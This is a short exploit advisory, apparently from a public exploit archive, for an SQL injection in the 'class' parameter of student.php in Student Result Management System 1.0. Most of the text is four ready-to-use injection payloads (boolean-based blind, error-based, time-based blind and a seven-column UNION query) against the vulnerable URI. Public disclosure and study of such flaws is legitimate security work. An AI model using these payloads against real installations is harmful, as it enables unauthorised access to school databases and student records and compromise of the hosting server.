# Exploit Title: Student Result Management System 1.0 - 'class' SQL Injection  
# Date: 09.09.2020  
# Exploit Author: Riadh Benlamine (rbn0x00)  
# Vendor Homepage :  
# Software Page:  
# Version: 1.0  
# Category: Webapps  
# Tested on: Apache2+MariaDB latest version  
# Description : student.php is prone to an SQL-injection vulnerability because it fails to sanitize user input before pushing it into SQL query.Exploiting this issue could allow the attacker to compromise the server.  
The vulnerable parameter uri: /srms/student.php?class=<injection point>  
Parameter: class (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)  
Payload: class=-6346' OR 3657=3657#&rn=1  
Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: class=1' OR (SELECT 3201 FROM(SELECT COUNT(*),CONCAT(0x71786a7171,(SELECT (ELT(3201=3201,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hNXT&rn=1  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: class=1' AND (SELECT 1049 FROM (SELECT(SLEEP(5)))gIdB)-- yYYR&rn=1  
Type: UNION query  
Title: MySQL UNION query (random number) - 7 columns  
Payload: class=1' UNION ALL SELECT 8674,8674,8674,CONCAT(0x71786a7171,0x45414967666b57777145704f476d6566766d6f694d707561566e6150744d73505370466e7a6c784c,0x71766b7a71),8674,8674,8674#&rn=1